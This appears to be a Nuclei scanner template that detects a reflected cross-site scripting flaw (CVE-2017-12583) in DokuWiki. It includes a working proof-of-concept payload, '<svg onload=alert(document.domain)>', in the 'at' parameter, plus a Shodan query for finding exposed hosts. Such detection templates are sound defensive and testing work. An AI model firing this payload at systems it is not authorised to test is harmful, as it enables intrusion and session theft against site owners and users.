nuclei-templates/http/cves/2017/CVE-2017-12583.yaml

51 lines
2.0 KiB
YAML

id: CVE-2017-12583
info:
name: DokuWiki - Cross-Site Scripting
author: DhiyaneshDK
severity: medium
description: DokuWiki through 2017-02-19b contains a cross-site scripting vulnerability in the DATE_AT parameter to doku.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Upgrade to the latest version of DokuWiki or apply the provided patch to fix the XSS vulnerability.
reference:
- https://github.com/splitbrain/dokuwiki/issues/2061
- https://nvd.nist.gov/vuln/detail/CVE-2017-12583
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-12583
cwe-id: CWE-79
epss-score: 0.00117
epss-percentile: 0.44712
cpe: cpe:2.3:a:dokuwiki:dokuwiki:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: dokuwiki
product: dokuwiki
shodan-query: http.title:"DokuWiki"
tags: cve,cve2017,xss,dokuwiki
http:
- method: GET
path:
- '{{BaseURL}}/dokuwiki/doku.php?id=wiki:welcome&at=<svg%20onload=alert(document.domain)>'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Unable to parse at parameter "<svg onload=alert(document.domain)>".</div>'
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200
# digest: 490a00463044022040428c7102aee34ec9392abb1a5987369b001372f29a97e6592a24621b4deee302206d6c2d35e3f7dcf178bac29764bc37dc1b7b92218a5ca66ca4c21d133e32a5a5:922c64590222798bb761d5b6d8e72950